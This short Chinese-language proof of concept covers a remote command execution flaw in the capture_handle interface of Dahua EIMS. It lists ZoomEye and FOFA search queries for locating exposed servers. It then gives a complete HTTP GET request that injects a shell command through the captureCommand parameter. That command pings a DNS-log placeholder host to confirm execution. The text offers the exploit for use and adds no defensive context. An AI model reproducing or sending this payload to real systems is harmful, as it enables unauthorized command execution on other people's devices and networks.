大华EIMS-capture_handle接口远程命令执行漏洞
大华EIMS-capture_handle接口远程命令执行漏洞
Zoomeye
app:"大华 EIMS"
fofa
"<title>eims</title>"
poc
GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20xxx.dnslog.cn%20index.pcap HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Host: :9080